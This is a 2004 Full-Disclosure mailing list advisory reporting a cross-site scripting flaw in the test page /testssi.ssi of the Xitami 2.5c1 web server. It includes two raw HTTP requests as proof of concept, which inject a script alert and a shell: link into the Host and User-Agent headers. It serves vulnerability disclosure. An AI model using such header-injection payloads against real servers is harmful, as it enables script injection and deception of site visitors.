[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] XSS in Xitami testssi.ssi

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] XSS in Xitami testssi.ssi
From: "Oliver@xxxxxxxxxx" <Oliver@xxxxxxxxxx>
Date: Thu, 22 Jul 2004 13:11:52 +0200


Xitami Imatix testssi.ssi XSS
=============================

Xitami is an easy to use and open source webserver, running on several
platforms.

What?
=====

Xitami Imatix 2.5c1 comes with the SSI test page /testssi.ssi, which
delivers
a website with the content of several SSI-variables.

Within the variables "HTTP_USER_AGENT" and "HTTP_REFERER", no
(sufficient) content
checking is done. The content of this variables is delivered by the
webbrowser, and
therefore can be manipulated by the user.

How?
====

Telnet (dont netcat!) to port 80:

GET /testssi.ssi HTTP/1.1
Host: localhost
User-Agent: <A HREF="shell:windows\system32\calc.exe">PLEASE CLICK HERE</A>
Connection: close


GET /testssi.ssi HTTP/1.1
Host: <script>alert("Please click at \"PLEASE CLICK HERE\"")</script>
User-Agent: <A HREF="shell:windows\system32\calc.exe">PLEASE CLICK HERE</A>
Connection: close


Misc:
=====
This_paper: www.oliverkarow.de/research/xitami25c1_testssi_XSS.txt
Screenshot: www.oliverkarow.de/research/xitami25c1_1.GIF
Screenshot: www.oliverkarow.de/research/xitami25c1_2.GIF
Version: 2.5c1 on Windows platform .... others not tested
Vendor: www.imatix.com
Date: 22.07.2004


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: [Full-Disclosure] multiple web browsers, multiple bugs - onUnload and location.href
Next by Date: Re: [Full-Disclosure] antisemtism, FD and bandwidth - what I want out of it
Previous by thread: Re: [Full-Disclosure] multiple web browsers, multiple bugs - onUnload and location.href
Next by thread: [Full-Disclosure] [ GLSA 200407-16 ] Linux Kernel: Multiple DoS and permission vulnerabilities
Index(es):
- Date
- Thread